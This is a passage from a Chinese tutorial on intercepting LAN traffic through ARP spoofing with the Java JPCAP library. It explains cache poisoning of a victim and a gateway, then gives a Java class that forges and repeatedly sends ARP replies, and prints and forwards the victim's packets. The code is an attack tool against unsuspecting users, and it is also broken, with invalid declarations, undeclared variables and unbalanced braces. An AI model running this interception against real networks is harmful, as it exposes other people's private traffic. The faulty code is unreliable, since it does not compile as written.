三．使用JPCAP实现监听

　　1．监听原理　

　　在详细说用JPCAP实现网络监听实现前，先简单介绍下监听的原理。

　　局域网监听利用的是所谓的“ARP欺骗”技术。在以前曾经一段阶段，局域网的布局是使用总线式（或集线式）结构，要到达监听只需要将网卡设定为混杂模式即可，但现在的局域网络普遍采用的是交换式网络，所以单纯靠混杂模式来达到监听的方法已经不可行了。所以为了达到监听的目的，我们需要“欺骗”路由器、“欺骗”交换机，即“ARP欺骗”技术。

　　假设本机为A，监听目标为B。

　　首先，伪造一个ARP REPLY包，数据链路层头及ARP内容部分的源MAC地址填入A的MAC地址，而源IP部分填入网关IP，目的地址填入B的MAC、IP，然后将这个包发送给B，而B接收到这个伪造的ARP REPLY包后，由于源IP为网关IP，于是在它的ARP缓存表里刷新了一项，将（网关IP，网关MAC）刷新成（网关IP，A的MAC）。而B要访问外部的网都需要经过网关，这时候这些要经过网关的包就通通流到A的机器上来了。

　　接着，再伪造一个ARP REPLY包，数据链路层头及ARP内容部分的源MAC地址填入A的MAC地址，而源IP部分填入B的IP，目的地址填入网关MAC、IP，然后将这个包发给网关，网关接收到这个伪造的ARP REPLY包后，由于源IP为B的IP，于是在它的ARP缓存表里刷新了一项，将（B的IP，B的MAC）刷新成（B的IP，A的MAC）。这时候外部传给B的数据包经过网关时，就通通转发给A。

　　这样还只是拦截了B的数据包而已，B并不能上网——解决方法是将接收到的包，除了目的地址部分稍做修改，其它原封不动的再转发出去，这样就达到了监听的目的——在B不知不觉中浏览了B所有的对外数据包。

　　ARP数据包解析

　　单元：Byte

Ethernet头部			ARP数据部分
6	6	2	2	2	2	2	4	6	4	6
目标MAC地址	源地MAC地址	类型号0x0800:ip 0x0806:ARP	局域网类型 以太网0x0001	网络协议类型 IP网络0x0800	MAC/IP地址长度，恒为0x06/04	ARP包类型 REPLY 0x0002	ARP目标IP地址	ARP目标MAC 地址	ARP源IP地址	ARP源MAC地址

　　2．用JPCAP实现监听

　　就如上面说的，为了实现监听，我们必须做四件事：

　　A．发送ARP包修改B的ARP缓存表；

　　B．发送ARP包修改路由ARP缓存表；

　　C．转发B发过来的数据包；

　　D．转发路由发过来的数据包；

　　下面我们给个小小的例子说明怎样实现。

　　我们假定运行这个程序的机器A只有一个网卡，只接一个网络，所在局域网为Ethernet，并且假定已经通过某种方式获得B和网关的MAC地址（例如ARP解析获得）。我们修改了B和网关的ARP表，并对他们的包进行了转发。

public class changeARP{ 　private NetworkInterface[] devices; //设备列表 　private NetworkInterface device; //要使用的设备 　private JpcapCaptor jpcap; //与设备的连接 　private JpcapSender sender; //用于发送的实例 　private byte[] targetMAC, gateMAC; //B的MAC地址，网关的MAC地址 　private byte[] String targetIp, String gateIp; //B的IP地址，网关的IP地址 　/** 　*初始化设备 　* JpcapCaptor.getDeviceList()得到设备可能会有两个，其中一个必定是“Generic 　*dialup adapter”，这是windows系统的虚拟网卡，并非真正的硬件设备。 　*注意：在这里有一个小小的BUG，如果JpcapCaptor.getDeviceList()之前有类似JFrame jf=new 　*JFame（）这类的语句会影响得到设备个数，只会得到真正的硬件设备，而不会出现虚拟网卡。 　*虚拟网卡只有MAC地址而没有IP地址，而且如果出现虚拟网卡，那么实际网卡的MAC将分 　*配给虚拟网卡，也就是说在程序中调用device. mac_address时得到的是00 00 00 00 00 00。 　*/ 　private NetworkInterface getDevice() throws IOException { 　　devices = JpcapCaptor.getDeviceList(); //获得设备列表 　　device = devices[0];//只有一个设备 　　jpcap = JpcapCaptor.openDevice(device, 2000, false, 10000); //打开与设备的连接 　　jpcap.setFilter(“ip”,true); //只监听B的IP数据包 　　sender = captor.getJpcapSenderInstance(); 　} 　/** 　*修改B和网关的ARP表。因为网关会定时发数据包刷新自己和B的缓存表，所以必须每隔一 　*段时间就发一次包重新更改B和网关的ARP表。 　*@参数 targetMAC B的MAC地址，可通过ARP解析得到； 　*@参数 targetIp B的IP地址； 　*@参数 gateMAC 网关的MAC地址； 　*/ 　public changeARP(byte[] targetMAC, String targetIp,byte[] gateMAC, String gateIp) 　throws UnknownHostException,InterruptedException { 　　this. targetMAC = targetMAC; 　　this. targetIp = targetIp; 　　this. gateMAC = gateMAC; 　　this. gateIp = gateIp; 　　getDevice(); 　　arpTarget = new ARPPacket(); //修改B的ARP表的ARP包 　　arpTarget.hardtype = ARPPacket.HARDTYPE_ETHER; //选择以太网类型(Ethernet) 　　arpTarget.prototype = ARPPacket.PROTOTYPE_IP; //选择IP网络协议类型 　　arpTarget.operation = ARPPacket.ARP_REPLY; //选择REPLY类型 　　arpTarget.hlen = 6; //MAC地址长度固定6个字节 　　arpTarget.plen = 4; //IP地址长度固定4个字节 　　arpTarget.sender_hardaddr = device.mac_address; //A的MAC地址 　　arpTarget.sender_protoaddr = InetAddress.getByName(gateIp).getAddress(); //网关IP 　　arpTarget.target_hardaddr = targetMAC; //B的MAC地址 　　arpTarget.target_protoaddr = InetAddress.getByName(targetIp).getAddress(); //B的IP 　　EthernetPacket ethToTarget = new EthernetPacket(); //创建一个以太网头 　　ethToTarget.frametype = EthernetPacket.ETHERTYPE_ARP;//选择以太包类型 　　ethToTarget.src_mac = device.mac_address; //A的MAC地址 　　ethToTarget.dst_mac = targetMAC; //B的MAC地址 　　arpTarget.datalink = ethToTarget; //将以太头添加到ARP包前 　　arpGate = new ARPPacket(); //修改网关ARP表的包 　　arpGate.hardtype = ARPPacket.HARDTYPE_ETHER; //跟以上相似，不再重复注析 　　arpGate.prototype = ARPPacket.PROTOTYPE_IP; 　　arpGate.operation = ARPPacket.ARP_REPLY; 　　arpGate.hlen = 6; 　　arpGate.plen = 4; 　　arpGate.sender_hardaddr = device.mac_address; 　　arpGate.sender_protoaddr = InetAddress.getByName(targetIp).getAddress(); 　　arpGate.target_hardaddr = gateMAC; 　　arpGate.target_protoaddr = InetAddress.getByName(gateIp).getAddress(); 　　EthernetPacket ethToGate = new EthernetPacket(); 　　ethToGate.frametype = EthernetPacket.ETHERTYPE_ARP; 　　ethToGate.src_mac = device.mac_address; 　　ethToGate.dst_mac = gateMAC; 　　arpGate.datalink = ethToGate; 　　thread=new Thread(new Runnable(){ //创建一个进程控制发包速度 　　public void run() { 　　　while (true) { 　　　　sender.sendPacket(arpTarget); 　　　　sender.sendPacket(arpGate); 　　　　Thread.sleep(500); 　　　}).start(); 　　　recP(); //接收数据包并转发 　　} 　　/** 　　*修改包的以太头，转发数据包 　　*参数 packet 收到的数据包 　　*参数 changeMAC 要转发出去的目标 　　*/ 　　private void send(Packet packet, byte[] changeMAC) { 　　　EthernetPacket eth; 　　　if (packet.datalink instanceof EthernetPacket) { 　　　　eth = (EthernetPacket) packet.datalink; 　　　　for (int i = 0; i < 6; i++) { 　　　　　eth.dst_mac[i] = changeMAC[i]; //修改包以太头，改变包的目标 　　　　　eth.src_mac[i] = device.mac_address[i]; //源发送者为A 　　　　} 　　　　sender.sendPacket(packet); 　　　} 　　} 　　/** 　　*打印接受到的数据包并转发 　　*/ 　　public void recP(){ 　　　IPPacket ipPacket = null; 　　　while(true){ 　　　　ipPacket = （IPPacket）jpcap.getPacket(); 　　　　System.out.println(ipPacket); 　　　　if (ipPacket.src_ip.getHostAddress().equals(targetIp)) 　　　　　send(packet, gateMAC); 　　　　else 　　　　　send(packet, targetMAC); 　　　} 　　}

　　注意：这个例子只是为了说明问题，并没有考虑到程序的健壮性，所以并不一定能在任何一台机器任何一个系统上运行。